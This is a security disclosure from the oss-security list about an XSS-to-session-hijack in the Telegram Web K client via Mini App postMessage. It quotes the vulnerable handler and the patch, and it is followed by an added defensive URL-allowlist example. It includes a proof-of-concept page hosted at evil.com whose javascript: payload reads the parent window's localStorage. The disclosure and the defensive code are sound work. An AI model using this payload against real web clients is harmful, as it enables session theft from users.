CVE-2024-33905

On Sun, Apr 28, 2024 at 5:59 PM Pedro Batista <pedba...@gmail.com> wrote:
> Hi oss-security,
>
> I would like to share a vulnerability I reported on the Telegram Web
> application, which is Open Source (https://github.com/morethanwords/tweb).
> The vulnerability is an XSS that can be exploited to achieve session
> hijacking with 1-click using Telegram Mini Apps.
>
> I reported the vulnerability on March 9th, 2024 and Telegram promptly
> fixed it on March 11th, 2024.
>
> # Vulnerable version: Telegram WebK 2.0.0 (486) and below
> # Fixed version: Telegram WebK 2.0.0 (488)
>
> # Attack Surface
> ## Telegram Mini Apps
> “Telegram Mini Apps are essentially web applications that you can run
> directly within the Telegram messenger interface. Mini Apps support
> seamless authorization, integrated crypto and fiat payments (via Google Pay
> and Apple Pay), tailored push notifications, and more.”
>
> https://core.telegram.org/bots/webapps
> https://ton.org/mini-apps
>
> It is important to highlight that this feature is heavily used for crypto
> payments in the TON Blockchain.
>
> # Static Analysis
> A cached version of the vulnerable file can be found here:
> - https://web.telegram.org/k/appDialogsManager-aLs9GOvc.js
>
> ```
> telegramWebView.addMultipleEventsListeners({
>   // [...]
>   web_app_open_link: ({url: t}) => { window.open(t, "_blank") }
> });
> ```
>
> The vulnerability was triggered with `postMessage` communication by
> abusing the event `web_app_open_link`, which allowed a new URL to remain
> within the JavaScript context of the parent window using the `javascript:`
> scheme as XSS payload.
>
> # Weaponized Setup
> 1. Attacker creates a Bot + Mini App
> 2. Sets the URL of the Mini App => https://evil.com/homepage.html
> 3. The exploit will be hosted in the homepage of the attacker’s site
> 3.1. homepage.html
>
> ```
> <body onload=exploit()>
> <script>
> function exploit() {
>   window.parent.postMessage(JSON.stringify({eventType: 'web_app_open_link',
>     eventData: {url: "javascript:alert(JSON.stringify(window.parent.localStorage))"}}), '*');
> }
> </script>
> </body>
> ```
>
> # Telegram Patch Commit
>
> https://github.com/morethanwords/tweb/commit/2153ea9878668769faac8dd5931b7e0b96a9f129/src/components/popups/webApp.ts
>
> ```
> export default function safeWindowOpen(url: string) {
>   window.open(url, '_blank', 'noreferrer');
> }
> ```
>
> # Demo
> I have published a writeup for this finding which includes the Exploit
> Demo; it's available here:
>
> https://medium.com/@pedbap/telegram-web-app-xss-session-hijacking-1-click-95acccdc8d90
>
> I recently requested a CVE for this vulnerability as well, looking forward
> to updating the thread as soon as it is issued.
>
> Thanks for looking into my report.
>
> Best regards,
> Pedro Baptista
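The root cause described in the report is a `postMessage` handler that passes an attacker-controlled URL straight to `window.open`, so a `javascript:` URL executes in the parent's context. The project's own fix (quoted above) adds the `noreferrer` window feature. The following is an added example, not tweb code and not from the reporter: it shows the complementary defence-in-depth check a handler for an embedded Mini App would apply, namely parsing the URL and allowing only `http:`/`https:` before opening anything. `isSafeExternalUrl`, `handleWebAppOpenLink`, `dispatchMiniAppMessage` and the injected `openFn` are hypothetical names chosen here; the two sample messages are constructed, one of them reusing the payload shape from the report.

```javascript
// Added example (not tweb project code): scheme allowlist for URLs received
// from an embedded Mini App over postMessage, as defence in depth alongside
// the 'noreferrer' window feature used in the project's fix.
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// Returns true only when `url` parses as an absolute URL with an allowed scheme.
// Relative URLs are rejected because they would resolve against the host page;
// javascript:, data:, blob: and anything else fail the allowlist.
function isSafeExternalUrl(url) {
  if (typeof url !== 'string') return false;
  let parsed;
  try {
    parsed = new URL(url); // throws on relative or malformed input
  } catch {
    return false;
  }
  return ALLOWED_SCHEMES.has(parsed.protocol);
}

// Hypothetical handler with the shape of the page's web_app_open_link event:
// validates first, then delegates to an injected opener (window.open in a browser).
function handleWebAppOpenLink(eventData, openFn) {
  const url = eventData && eventData.url;
  if (!isSafeExternalUrl(url)) {
    return { opened: false, reason: 'rejected: disallowed or malformed URL' };
  }
  openFn(url, '_blank', 'noopener,noreferrer');
  return { opened: true, reason: null };
}

// Parses a message the way the report's payload is built (a JSON string with
// eventType/eventData) and dispatches only the one known event type.
function dispatchMiniAppMessage(rawMessage, openFn) {
  let msg;
  try {
    msg = JSON.parse(rawMessage);
  } catch {
    return { opened: false, reason: 'rejected: not JSON' };
  }
  if (!msg || msg.eventType !== 'web_app_open_link') {
    return { opened: false, reason: 'ignored: unknown event' };
  }
  return handleWebAppOpenLink(msg.eventData, openFn);
}

// Constructed sample messages: the payload shape from the report and a benign link.
const PAYLOAD_FROM_PAGE = JSON.stringify({
  eventType: 'web_app_open_link',
  eventData: { url: 'javascript:alert(JSON.stringify(window.parent.localStorage))' },
});
const BENIGN_MESSAGE = JSON.stringify({
  eventType: 'web_app_open_link',
  eventData: { url: 'https://example.com/page' },
});

// Stand-alone demo: record what would have been opened instead of calling window.open.
const openedUrls = [];
const recordOpen = (url) => openedUrls.push(url);
console.log(dispatchMiniAppMessage(PAYLOAD_FROM_PAGE, recordOpen)); // opened: false
console.log(dispatchMiniAppMessage(BENIGN_MESSAGE, recordOpen));    // opened: true
console.log('opened:', openedUrls);                                 // only the https URL
```

Using the `URL` parser rather than a string prefix check matters here: the parser normalises scheme case and strips leading whitespace, so variants such as `JAVASCRIPT:` or ` javascript:` still land on a protocol that is not in the allowlist. The `noopener,noreferrer` features are kept as well, since the allowlist and the opener isolation defend against different failure modes.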